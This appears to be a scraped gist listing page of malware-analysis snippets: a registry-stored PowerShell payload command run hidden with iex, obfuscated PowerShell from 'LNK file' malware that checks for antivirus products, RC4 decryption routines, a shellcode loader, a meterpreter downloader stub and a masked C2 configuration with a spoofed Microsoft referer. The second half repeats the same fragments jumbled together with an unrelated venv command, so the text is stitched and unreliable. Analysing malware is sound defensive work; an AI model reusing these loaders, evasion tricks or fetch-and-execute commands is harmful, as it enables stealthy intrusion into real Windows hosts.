jdferrell3

## powershell_payload_shellcode.asm
; shellcode found on Windows host. Payload was stored in the registry. Powershell
; was used to extract it from the registry and execute it:
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \
; hidden -c "$val = (gp HKLM:SOFTWARE\'਀਀').'਀਀'; \
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d"

; The following references were used to help comment the shellcode
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/

## logfile-comparison.ps1
# From "LNK file" malware
function Get-Soft {
  param (
    [Parameter(ValueFromPipeline=$true)]
    [string[]]$ComputerName = $env:COMPUTERNAME,
    [string]$NameRegex = ((("{13}{5}{7}{30}{16}{4}{18}{10}{8}{26}{11}{21}{24}{6}{23}{2}{3}{19}{20}{1}{14}{29}{0}{12}{28}{15}{22}{27}{25}{17}{9}"-f'do','ntiX','RgSec','ury','LACERTEXRgPROSERIES','RgFire','nde','foxXRgChr','XR','OS)','us','ire','XRgKasperXRgProtec','(OperaX','Rg',' of ','XRgTAXXRgOLTXRg','gP','XRgVir','X','RgA','wallXRg','Sale','rX','Defe','R','gF','X','tXRgPoint','Como','ome')).REpLace(([ChAR]88+[ChAR]82+[ChAR]103),[StRING][ChAR]124))
  )
  foreach ($comp in $ComputerName) {
    $keys = '',((("{2}{3}{4}{1}{0}" -f 'Node','32','{0','}','Wow64')) -f [CHAr]92)
    foreach ($key in $keys) {

## logfile-final-payload-anon.ps1
function rsrzis {
  $Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
  $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
  $ErrorActionPreference = "SilentlyContinue";

function wlc2 {
     param([Byte[]]$mfvoiqhn_12tkvf,[Byte[]]$gibqokxyxbupwcsrtuvm_41nhwrp)
     [Byte[]]$eplkztikdybroisgypg9qdbjfhmi = New-Object Byte[] $mfvoiqhn_12tkvf.Length;$mfvoiqhn_12tkvf.CopyTo($eplkztikdybroisgypg9qdbjfhmi, 0);[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256;
     for ($i = 0; $i -lt 256; $i++){$s[$i] = [Byte]$i;$k[$i] = $gibqokxyxbupwcsrtuvm_41nhwrp[$i % $gibqokxyxbupwcsrtuvm_41nhwrp.Length];}
     $j = 0;for ($i = 0; $i -lt 256; $i++){$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;};$i = $j = 0;

## powershell_payload_decoded.ps1
# Formatting tweaked for readablity as an embedded gist, will not execute
# commented as well

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
  Param ($var_module, $var_procedure)
  $var_unsafe_native_methods = (
    [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object {

## logfile-first-payload.ps1
$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False;
Function jpnm {
    sal bifsynume Add-Type ;
if ($($PSVersionTable.PSVersion.Major) -ge 3){$e = 'CSharp'}else{$e = 'CSharpVersion3'}
    bifsynume @"
using System;
using System.Runtime.InteropServices;

public class tqjn
{

## removebyhash.ps1
# remove files that match a specified hash

$PATH = "c:\testing"
$HASH = "39DD73E4DAE46B506E7F9B41066F7F21E5D61DADD4D2B5806D31E364886C2D08"

$files = Get-ChildItem -Path $PATH -File
ForEach ($f in $files)
{
    $fullpath = "$PATH\$f"
    $hashInfo = Get-FileHash $fullpath -Algorithm SHA256

## meterpreter_downloader.ps1
$IP = 'X.X.X.X'
$Port = 53
$VirtualAlloc = $null
$CreateThread = $null
$WaitForSingleObject = $null
$XORKEY = 0x50
function XorByteArr
{
Param
(

## lnk_powershell_stage3_deobfuscated
# Semi-deobfuscated PowerShell from malware analysis

function sdnfjshdklfhlj {
 $ag = @{
   srv = ("{3}{1}{0}{2}{4}{5}"-f '.','//YYY','Y','http:','Y.YYY','.YYY');
   skkey = 'b[CgNFd8=sSQ{YsBcX6|PJ+A~w?#LEKH';
   usag = (("{3}{9}{12}{14}{0}{18}{11}{7}{5}{16}{20}{23}{1}{8}{19}{6}{10}{22}{15}{2}{4}{21}{13}{17}"-f 'NT 6.1;','o); OPR/4','.0.3282.1','Mozilla/5','19; ','WebKit/5','44; Ch','ple','3.','.0 (Wi','rome','; x64) Ap','ndow','5','s ','64','37.36','37.36',' Win64','0.2441.11',' (KHTML, like ','Safari/','/','Geck'));
   conType = ("{1}{0}{4}{2}{3}"-f 'pl','ap','ion/x','ml','icat')
   reffer = ("{9}{2}{4}{7}{3}{8}{0}{10}{11}{5}{6}{12}{1}"-f 'oft','x','/www.u','i','pdate','/d','oc','.m','cros','https:/','.','com','s.asp');
   encutf = [System.Text.Encoding]::UTF8;

## DisplayPath.cpp
#ifndef UNICODE
#define UNICODE
#endif

#include<windows.h>

int WINAPI wWinMain(HINSTANCE hinstance, HINSTANCE hprevinstance, PWSTR szCmdLine, int nCmdShow)
{
	wchar_t path[256];
	DWORD size = 256;

## gist:6b2be0386caff742fbc1647714d7a21a
apt-get install python3-venv
python3 -m venv {env_dir}
	; shellcode found on Windows host. Payload was stored in the registry. Powershell
	; was used to extract it from the registry and execute it:
	; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \
	; hidden -c "$val = (gp HKLM:SOFTWARE\'਀਀').'਀਀'; \
	; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d"

	; The following references were used to help comment the shellcode
	; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm
	; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/
	# From "LNK file" malware
	function Get-Soft {
	param (
	[Parameter(ValueFromPipeline=$true)]
	[string[]]$ComputerName = $env:COMPUTERNAME,
	[string]$NameRegex = ((("{13}{5}{7}{30}{16}{4}{18}{10}{8}{26}{11}{21}{24}{6}{23}{2}{3}{19}{20}{1}{14}{29}{0}{12}{28}{15}{22}{27}{25}{17}{9}"-f'do','ntiX','RgSec','ury','LACERTEXRgPROSERIES','RgFire','nde','foxXRgChr','XR','OS)','us','ire','XRgKasperXRgProtec','(OperaX','Rg',' of ','XRgTAXXRgOLTXRg','gP','XRgVir','X','RgA','wallXRg','Sale','rX','Defe','R','gF','X','tXRgPoint','Como','ome')).REpLace(([ChAR]88+[ChAR]82+[ChAR]103),[StRING][ChAR]124))
	)
	foreach ($comp in $ComputerName) {
	$keys = '',((("{2}{3}{4}{1}{0}" -f 'Node','32','{0','}','Wow64')) -f [CHAr]92)
	foreach ($key in $keys) {
	function rsrzis {
	$Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
	$Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
	$ErrorActionPreference = "SilentlyContinue";

	function wlc2 {
	param([Byte[]]$mfvoiqhn_12tkvf,[Byte[]]$gibqokxyxbupwcsrtuvm_41nhwrp)
	[Byte[]]$eplkztikdybroisgypg9qdbjfhmi = New-Object Byte[] $mfvoiqhn_12tkvf.Length;$mfvoiqhn_12tkvf.CopyTo($eplkztikdybroisgypg9qdbjfhmi, 0);[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256;
	for ($i = 0; $i -lt 256; $i++){$s[$i] = [Byte]$i;$k[$i] = $gibqokxyxbupwcsrtuvm_41nhwrp[$i % $gibqokxyxbupwcsrtuvm_41nhwrp.Length];}
	$j = 0;for ($i = 0; $i -lt 256; $i++){$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;};$i = $j = 0;
	# Formatting tweaked for readablity as an embedded gist, will not execute
	# commented as well

	Set-StrictMode -Version 2

	$DoIt = @'
	function func_get_proc_address {
	Param ($var_module, $var_procedure)
	$var_unsafe_native_methods = (
	[AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object {
	$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False;
	Function jpnm {
	sal bifsynume Add-Type ;
	if ($($PSVersionTable.PSVersion.Major) -ge 3){$e = 'CSharp'}else{$e = 'CSharpVersion3'}
	bifsynume @"
	using System;
	using System.Runtime.InteropServices;

	public class tqjn
	{
	# remove files that match a specified hash

	$PATH = "c:\testing"
	$HASH = "39DD73E4DAE46B506E7F9B41066F7F21E5D61DADD4D2B5806D31E364886C2D08"

	$files = Get-ChildItem -Path $PATH -File
	ForEach ($f in $files)
	{
	$fullpath = "$PATH\$f"
	$hashInfo = Get-FileHash $fullpath -Algorithm SHA256
	$IP = 'X.X.X.X'
	$Port = 53
	$VirtualAlloc = $null
	$CreateThread = $null
	$WaitForSingleObject = $null
	$XORKEY = 0x50
	function XorByteArr
	{
	Param
	(
	# Semi-deobfuscated PowerShell from malware analysis

	function sdnfjshdklfhlj {
	$ag = @{
	srv = ("{3}{1}{0}{2}{4}{5}"-f '.','//YYY','Y','http:','Y.YYY','.YYY');
	skkey = 'b[CgNFd8=sSQ{YsBcX6\|PJ+A~w?#LEKH';
	usag = (("{3}{9}{12}{14}{0}{18}{11}{7}{5}{16}{20}{23}{1}{8}{19}{6}{10}{22}{15}{2}{4}{21}{13}{17}"-f 'NT 6.1;','o); OPR/4','.0.3282.1','Mozilla/5','19; ','WebKit/5','44; Ch','ple','3.','.0 (Wi','rome','; x64) Ap','ndow','5','s ','64','37.36','37.36',' Win64','0.2441.11',' (KHTML, like ','Safari/','/','Geck'));
	conType = ("{1}{0}{4}{2}{3}"-f 'pl','ap','ion/x','ml','icat')
	reffer = ("{9}{2}{4}{7}{3}{8}{0}{10}{11}{5}{6}{12}{1}"-f 'oft','x','/www.u','i','pdate','/d','oc','.m','cros','https:/','.','com','s.asp');
	encutf = [System.Text.Encoding]::UTF8;
	#ifndef UNICODE
	#define UNICODE
	#endif

	#include<windows.h>

	int WINAPI wWinMain(HINSTANCE hinstance, HINSTANCE hprevinstance, PWSTR szCmdLine, int nCmdShow)
	{
	wchar_t path[256];
	DWORD size = 256;